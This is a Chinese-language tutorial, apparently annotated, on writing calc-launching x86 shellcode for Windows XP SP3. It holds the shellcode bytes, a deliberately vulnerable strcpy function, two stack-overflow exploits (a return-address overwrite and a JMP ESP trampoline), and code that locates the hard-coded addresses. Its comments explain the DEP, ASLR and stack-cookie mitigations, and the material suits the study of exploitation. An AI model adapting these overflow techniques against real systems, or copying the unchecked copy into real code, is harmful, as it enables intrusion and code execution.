
Shellcode的简单取得

以弹出计算器为例

 

.c

    // Reference C for everything that follows: launch calc.exe through the
    // CRT's system(), then terminate the process without returning. The
    // inline-asm block and the byte listing below are hand encodings of
    // exactly these two calls.
    system("calc.exe");
    exit(0);

 

.asm

     // MSVC 32-bit inline assembly (MASM syntax) equivalent to the two C
     // statements above. Both strings are assembled on the stack, then three
     // absolute addresses are called. The two msvcrt addresses come from the
     // XP SP3 listing further down the page; all three are valid only for
     // that exact OS build at the modules' default bases - with ASLR, or on
     // any other build, they do not hold the intended functions and the
     // sequence simply crashes.
     // NOTE(review): the operands written as d.tr, cvsm, exe., clac and l
     // look like MASM character literals whose quotes were lost when the page
     // was rendered; the hex listing below shows the immediates actually
     // encoded.
     __asm
     {
         // --- build "msvcrt.dll\0\0" (12 bytes) back to front
         xor eax, eax
         push eax                          // four zero bytes: terminator slot
         mov byte ptr [esp], l             // [esp]   = 'l'
         mov byte ptr [esp+1], l           // [esp+1] = 'l'  -> "ll\0\0"
         push d.tr                         // "rt.d" in memory order
         push cvsm // push msvcrt.dll 0 0, 12 bytes: stack now reads "msvcrt.dll\0\0"
         mov eax, esp
         push eax // argument: address of the "msvcrt.dll" string just built
         mov eax, 7c801d7bh//LoadLibraryA, hard-coded (XP SP3; not derived on this page)
         call eax
 
         // --- build "calc.exe\0\0\0\0" (12 bytes)
         xor eax, eax
         push eax                          // terminator
         push exe.                         // ".exe"
         push clac // push calc.exe 0 0 0 0, 12 bytes: stack now reads "calc.exe\0..."
         mov eax, esp
         push eax // argument: address of the "calc.exe" string
         mov eax,77BF93C7h//msvcrt!system, hard-coded (XP SP3, see address listing below)
         call eax
 
         // --- exit(0): does not return, so nothing pushed above is cleaned up
         xor eax, eax
         push eax                          // argument: status 0
         mov eax,77C09E7Eh//msvcrt!exit, hard-coded (XP SP3, see address listing below)
         call eax
     }


 

 

 

ShellCode 

    // Machine-code bytes of the __asm block above (x86, 65 bytes), so the
    // same sequence can be placed in a buffer. Jumping into a char array only
    // works where that memory is executable; with DEP/NX enabled the call at
    // the bottom faults instead of running, which is exactly the mitigation
    // this technique predates.
    unsigned char uc[] = 
        "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"  // xor/push/mov byte x2/push "rt.d"
        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"  // push "msvc"; mov eax,esp; push; mov eax,7c801d7bh; call eax
        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"  // xor/push/push ".exe"/push "calc"; mov eax,esp; push
        "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"  // mov eax,77BF93C7h; call eax; xor/push; mov eax,77C09E7Eh; call
        "\xD0";
    // Treat the array's address as a no-arg function and call it.
    typedef void (*FUNC)();
    ((FUNC)&uc)();

 

 

Stack Overflow 1

    // Deliberately vulnerable target used by both overflow examples below:
    // copies a caller-controlled string into a 10-byte stack buffer with no
    // length check, so anything past the tenth byte overwrites the frame data
    // that follows buf, including func1's saved return address. A bounded
    // copy (length check / strncpy_s), stack cookies (/GS), DEP and ASLR are
    // the standard defences against this pattern.
    void func1(char* s)
    {
        char buf[10];
        strcpy(buf, s);
    }
    // Overflow 1: a 16-byte string whose last dword is patched to the address
    // of the ShellCode array, so that func1's return lands in uc.
    char ch[] = "0123456789123456";// length is an integer multiple of 4
    DWORD* pEIP = (DWORD*)&ch[12];// saved-return-address slot: +12 in a release build, +16 in a debug build
    *pEIP = (DWORD)uc;// return address now points at the ShellCode array defined above
    func1(ch);

 

ShellCode Overflow 2

    // Overflow 2: the whole payload travels inside the overflowing string.
    // Layout: 16 filler bytes, then 0x77D29353 little-endian (the FF E4 /
    // JMP ESP location in user32.dll printed by the scan further down), then
    // the same ShellCode bytes as above. After func1's ret, esp points at the
    // bytes that follow the overwritten return address, which is where the
    // shellcode starts. user32.dll is loaded first so that address is mapped;
    // hMod is not otherwise used in this snippet. As with the rest of the
    // page this depends on a fixed XP SP3 module base and executable stack
    // memory - ASLR and DEP each break it independently.
    HMODULE hMod = LoadLibrary("user32.dll");
    unsigned char uc[] = 
        "1234567890123456\x53\x93\xD2\x77\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"  // filler, JMP ESP address, shellcode start
        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
        "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
        "\xD0";
    func1((char*)uc);

 

XP SP3 相关地址取得

    // How the two msvcrt addresses hard-coded in the ShellCode were obtained
    // on XP SP3: load the DLL and print the resolved exports. The printed
    // values hold only for that exact DLL build at its default base; any CRT
    // update, a different OS build, or ASLR (Vista and later) changes them.
    HMODULE hMod = LoadLibrary("msvcrt.dll");
    if (hMod)
    {
        printf("%p\r\n", GetProcAddress(hMod, "system"));// 77BF93C7 on XP SP3
        printf("%p\r\n", GetProcAddress(hMod, "exit"));// 77C09E7E on XP SP3
        FreeLibrary(hMod);
    }

    // How the 0x77D29353 used in Overflow 2 was obtained on XP SP3: walk
    // user32.dll's image from its base and print the first FF E4 (JMP ESP)
    // found. The loop has no explicit upper bound; it ends at the first match
    // or when the read runs off the mapped image and raises an access
    // violation.
    // NOTE(review): catch(...) only intercepts that access violation when the
    // file is compiled with /EHa (asynchronous exceptions); under the default
    // /EHsc the fault is not caught and the process crashes instead.
    HMODULE hMod = LoadLibrary("user32.dll");
     if (hMod)
     {
         PBYTE pTravel = (PBYTE)hMod;   // HMODULE is the module base, i.e. the start of the image
         BOOL bLoop = TRUE;
         for (DWORD i = 0; bLoop; i++)
         {
             // Opcode table for the register-indirect JMP/CALL forms; this
             // scan matches only JMP ESP (FF E4).
             //FF E0        JMP EAX
             //FF E1        JMP ECX
             //FF E2        JMP EDX
             //FF E3        JMP EBX
             //FF E4        JMP ESP
             //FF E5        JMP EBP
             //FF E6        JMP ESI
             //FF E7        JMP EDI
 
             //FF D0        CALL EAX
             //FF D1        CALL ECX
             //FF D2        CALL EDX
             //FF D3        CALL EBX
             //FF D4        CALL ESP
             //FF D5        CALL EBP
             //FF D6        CALL ESI
             //FF D7        CALL EDI
             try
             {
                 if(pTravel[i] == 0xFF && pTravel[i+1] == 0xE4)
                 {
                     printf("%p\r\n", pTravel + i);// 77D29353 on XP SP3
                     break;
                 }
             }
             catch(...)
             {
                 bLoop = FALSE;            // read faulted past the image: stop scanning
             }
         }
         FreeLibrary(hMod);
     }

 
